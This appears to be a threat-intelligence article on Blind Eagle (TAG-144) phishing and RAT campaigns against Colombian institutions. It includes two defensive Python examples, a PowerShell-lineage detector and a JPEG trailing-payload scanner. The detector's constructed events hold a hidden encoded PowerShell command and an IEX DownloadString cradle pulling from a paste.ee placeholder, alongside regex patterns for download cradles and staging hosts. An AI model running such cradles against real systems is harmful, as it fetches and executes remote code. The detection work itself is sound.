Blind Eagle’s Expanding Cyber Campaigns: Five Clusters Targeting Colombia’s Government and Beyond
Researchers at Recorded Future’s Insikt Group documented five distinct clusters of activity attributed to the persistent threat actor Blind Eagle (also tracked as TAG-144) between May 2024 and July 2025. The primary focus of these operations was Colombia’s government sector at the local, municipal, and federal levels, though other industries were also affected, and the group’s reach occasionally extended beyond national borders.
The adversary’s profile emerges through recurring tactics implemented with varied execution. Across all clusters, common techniques appear: reliance on open-source or cracked remote access trojans (RATs), use of dynamic domain providers, and abuse of legitimate internet services (LIS) for staging payloads. Yet, infrastructure, delivery mechanisms, and operational nuances differ markedly from one campaign to another, complicating straightforward signature-based correlation.
Blind Eagle has been active since at least 2018 with a hybrid of motives, blending classic cyberespionage with financially driven objectives. Recent operations paired banking keyloggers and browser monitoring with targeted intrusions into government agencies that deployed a rotating set of RATs. Victims included not only executive authorities but also the judiciary, tax offices, finance, oil and gas, energy, education, healthcare, manufacturing, and professional services. While Colombia remained the central battleground, incidents were also recorded in Ecuador, Chile, and Panama, as well as among Spanish-speaking users in North America.
Infection chains typically began with spear-phishing emails purporting to originate from local government agencies. These lures prompted recipients to open malicious documents or click shortened URLs delivered via services such as cort[.]as, acortaurl[.]com, and gtly[.]to. To bolster credibility, attackers often used compromised email accounts belonging to legitimate institutions. Geofiltering was also employed: attempts to access malicious infrastructure from outside Colombia or Ecuador were redirected to official government websites, masking the true nature of the servers during external scrutiny. The practical consequence for defenders is that a sample detonated from a sandbox or analyst workstation outside those countries will appear to contact a legitimate government site; analysis of the staging infrastructure needs in-region egress, or the URLs should be treated as suspect on the strength of the lure and the redirect behaviour alone.
TAG-144’s command-and-control (C2) servers frequently leveraged IP addresses from Colombian telecom providers, alongside VPS infrastructure hosted by providers such as Proton666, and VPN services including Powerhouse Management, FrootVPN, and TorGuard. Dynamic DNS platforms (duckdns[.]org, ip-ddns[.]com, and noip[.]com) added further obfuscation, allowing rapid rotation of the IP behind a hostname and making infrastructure harder to track and pivot on over time.
For staging payloads, attackers leaned heavily on legitimate services like Bitbucket, Discord, Dropbox, GitHub, Google Drive, Internet Archive, lovestoblog[.]com, Paste.ee, Tagbox, and smaller Brazilian image-hosting platforms. This strategy minimized reputational red flags and eased passage through corporate defenses.
Two delivery chains were especially characteristic. In the first, a Visual Basic Script (VBS) attachment served as the dropper, generating PowerShell scripts at run time that fetched injector modules; the injectors then loaded RATs such as Lime RAT, DCRat, AsyncRAT, or Remcos RAT. In the second, an SVG attachment retrieved JavaScript from Discord’s CDN, which in turn pulled a PowerShell script from Paste.ee. That script decoded a further PowerShell stage, which downloaded a JPEG from Internet Archive and extracted a .NET assembly embedded in it. Hiding the core binary inside an image in this way kept it out of sight of controls that inspect attachments and script content, since what crosses the wire at that stage is an image fetched from a reputable host.
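The first chain leaves a characteristic process lineage on the endpoint: a Windows script host (wscript.exe or cscript.exe) spawning PowerShell, usually with an encoded command or a download cradle. The detector below is an added example, not Insikt Group's tooling, and runs over constructed process-creation events; the file names, PIDs and command lines are invented for illustration, and the host patterns are drawn from the staging and dynamic DNS services named in this article.

```python
# Added example (not Insikt Group code): flag PowerShell launched under a Windows
# script host, the lineage of the VBS-dropper chain, plus command-line traits
# typical of download cradles. All event data below is constructed.
import re

# Constructed process-creation events (pid, parent pid, image, command line).
EVENTS = [
    {"pid": 100, "ppid": 1,   "image": "explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": "outlook.exe",  "cmdline": "outlook.exe"},
    {"pid": 300, "ppid": 200, "image": "wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\u\AppData\Local\Temp\Notificacion.vbs"'},
    {"pid": 400, "ppid": 300, "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"},
    {"pid": 500, "ppid": 100, "image": "powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\backup.ps1"},  # benign admin use
    {"pid": 600, "ppid": 300, "image": "cmd.exe", "cmdline": "cmd.exe /c start"},
    {"pid": 700, "ppid": 600, "image": "powershell.exe",
     "cmdline": "powershell.exe IEX (New-Object Net.WebClient).DownloadString('https://paste.ee/d/constructed')"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}

# Command-line traits: encoded command, in-memory execution, download cradle,
# and the staging / dynamic DNS hosts named in the article.
CRADLE_PATTERNS = [
    (re.compile(r"\s-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I), "encoded_command"),
    (re.compile(r"\b(IEX|Invoke-Expression)\b", re.I), "invoke_expression"),
    (re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I), "download_cradle"),
    (re.compile(r"paste\.ee|cdn\.discordapp\.com|archive\.org|duckdns\.org|ip-ddns\.com|noip\.com", re.I),
     "staging_or_ddns_host"),
]


def script_host_ancestor(pid, by_pid, max_depth=5):
    """Return the image name of the nearest script-host ancestor, or None.

    Walks the parent chain up to max_depth so an intermediate cmd.exe
    (wscript -> cmd -> powershell) does not hide the lineage.
    """
    ev = by_pid.get(pid)
    for _ in range(max_depth):
        if ev is None:
            return None
        parent = by_pid.get(ev["ppid"])
        if parent is None:
            return None
        if parent["image"].lower() in SCRIPT_HOSTS:
            return parent["image"]
        ev = parent
    return None


def flag_powershell(events):
    """Return [(pid, reasons)] for PowerShell processes worth triage.

    A script-host ancestor is enough on its own; otherwise two or more
    command-line traits are required, so plain '-File backup.ps1' stays quiet.
    """
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if e["image"].lower() != "powershell.exe":
            continue
        reasons = [name for rx, name in CRADLE_PATTERNS if rx.search(e["cmdline"])]
        host = script_host_ancestor(e["pid"], by_pid)
        if host:
            reasons.insert(0, f"parent_chain:{host}")
        if host or len(reasons) >= 2:
            findings.append((e["pid"], reasons))
    return findings


if __name__ == "__main__":
    for pid, reasons in flag_powershell(EVENTS):
        print(pid, ", ".join(reasons))
```

The script-host lineage alone is treated as sufficient because it is rare in administrative use, while the command-line traits need corroboration: `-enc` and `IEX` appear in plenty of legitimate automation, and an SVG-based variant of the chain will never pass through wscript.exe at all, so the cradle patterns are what catch it.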
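For the second chain, the file a proxy or sandbox actually sees is a JPEG from Internet Archive, so a useful triage step is to check whether an image carries executable content past its End-Of-Image marker. The scanner below is an added example, not from the Insikt Group report; the report does not say how the assembly was embedded, so the two carriers it checks (a raw PE appended after EOI, or a base64 run of one) are an assumption, and a real sample may use something else. The JPEG and "assembly" bytes are constructed inline.

```python
# Added example (not from the Insikt Group report): check whether a JPEG carries a
# PE/.NET assembly after its End-Of-Image marker, raw or base64-encoded. The carrier
# types are an assumption; the report does not describe the embedding. Samples are constructed.
import base64
import re

SOS, EOI = 0xDA, 0xD9
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{64,}={0,2}")


def find_eoi(data: bytes) -> int:
    """Walk JPEG marker segments and return the offset just past the EOI marker.

    Entropy-coded data after SOS is skipped byte-wise: 0xFF00 is a stuffed byte
    and 0xFFD0-0xFFD7 are restart markers; neither ends the scan. Searching for
    the last 0xFFD9 in the file would be wrong, since the appended payload may
    itself contain those bytes.
    """
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI")
    pos = 2
    while pos + 1 < len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        marker = data[pos + 1]
        if marker == EOI:
            return pos + 2
        seg_len = int.from_bytes(data[pos + 2:pos + 4], "big")
        pos += 2 + seg_len
        if marker == SOS:
            while pos + 1 < len(data):
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt != 0x00 and not 0xD0 <= nxt <= 0xD7:
                    break
                pos += 1
    raise ValueError("EOI marker not found")


def looks_like_pe(blob: bytes) -> bool:
    """MZ stub plus a PE signature reachable through e_lfanew at offset 0x3C."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(blob[0x3C:0x40], "little")
    return blob[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def is_dotnet(blob: bytes) -> bool:
    # "BSJB" is the signature of the CLR metadata root present in managed assemblies.
    return b"BSJB" in blob


def extract_trailing_payload(data: bytes):
    """Return (carrier_kind, payload); kind is 'clean', 'raw_pe', 'base64_pe' or 'unknown_trailer'."""
    tail = data[find_eoi(data):]
    if not tail.strip(b"\x00\r\n\t "):
        return "clean", b""
    if looks_like_pe(tail):
        return "raw_pe", tail
    for run in B64_RUN.finditer(tail):
        chunk = run.group(0)
        chunk = chunk[: len(chunk) - len(chunk) % 4]  # drop a partial final quantum
        try:
            decoded = base64.b64decode(chunk, validate=True)
        except ValueError:
            continue
        if looks_like_pe(decoded):
            return "base64_pe", decoded
    return "unknown_trailer", tail


def _fake_assembly() -> bytes:
    """Constructed stand-in for an assembly: MZ stub, e_lfanew -> 'PE\\0\\0', CLR 'BSJB' marker."""
    hdr = bytearray(0x40)
    hdr[:4] = b"MZ\x90\x00"
    hdr[0x3C:0x40] = (0x40).to_bytes(4, "little")
    return bytes(hdr) + b"PE\x00\x00" + b"\x00" * 20 + b"BSJB" + b"\x00" * 8


# Minimal constructed JPEG: SOI, APP0/JFIF, SOS whose scan data contains a stuffed
# 0xFF00 byte and an RST3 marker, then EOI.
CLEAN_JPEG = (
    b"\xff\xd8"
    + b"\xff\xe0" + (16).to_bytes(2, "big") + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    + b"\xff\xda" + (8).to_bytes(2, "big") + b"\x01\x01\x00\x00\x3f\x00"
    + b"\x12\x34\xff\x00\x56\xff\xd3\x78"
    + b"\xff\xd9"
)
RAW_CARRIER = CLEAN_JPEG + _fake_assembly()
B64_CARRIER = CLEAN_JPEG + b"\n" + base64.b64encode(_fake_assembly()) + b"\n"

if __name__ == "__main__":
    for name, sample in [("clean", CLEAN_JPEG), ("raw", RAW_CARRIER), ("b64", B64_CARRIER)]:
        kind, payload = extract_trailing_payload(sample)
        print(name, kind, len(payload), "dotnet" if is_dotnet(payload) else "")
```

The segment walk matters more than it looks: image viewers stop at the first EOI and render the file normally, which is exactly why a trailer survives casual inspection, while a scanner that only looks at the last bytes of the file can be fooled by a payload that itself ends with `\xff\xd9`. An `unknown_trailer` result is still worth a look; legitimate cameras do append metadata after EOI, but an image fetched by PowerShell mid-infection does not need the benefit of the doubt.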
Recorded Future analysts mapped five distinct clusters:
- Cluster 1 (Feb–Jul 2025): exclusively targeted Colombian government entities, leveraging DCRat, AsyncRAT, and Remcos RAT.
- Cluster 2 (Sep–Dec 2024): broadened scope to include education, defense, and retail; employed AsyncRAT and XWorm.
- Cluster 3 (Sep 2024–Jul 2025): characterized by consistent deployment of AsyncRAT and Remcos RAT in tandem.
- Cluster 4 (May 2024–Feb 2025): linked to phishing and malicious infrastructure imitating Banco Davivienda, Bancolombia, and BBVA.
- Cluster 5 (Mar–Jul 2025): associated with Lime RAT and a modified AsyncRAT build, overlapping with activity in Clusters 1 and 2.
Of note, the cracked AsyncRAT variant used by Blind Eagle was previously observed in incidents attributed to Red Akodon and Shadow Vector, both of which also targeted Colombian organizations. This highlights the presence of a shared underground marketplace for illicit builds and complicates attribution based solely on binary artifacts.
Statistics across the observation period are striking: nearly 60% of incidents targeted the government sector, followed by education, healthcare, retail, transportation, defense, and the oil industry. Despite occasional forays into neighboring countries and among Spanish-speaking communities in the United States, Colombia — particularly its state institutions — remains the group’s clear priority.
Recorded Future’s conclusion is pragmatic: Blind Eagle illustrates how well-rehearsed, fundamentally unoriginal techniques can still yield high rates of infection in the region. At the same time, the group’s persistence in targeting specific sectors raises questions about ultimate intent: are they merely monetizing stolen data and access using familiar tools and schemes, or do certain operations pursue intelligence-gathering objectives suggestive of state sponsorship? Both interpretations remain plausible and consistent with the observed tactics and victimology.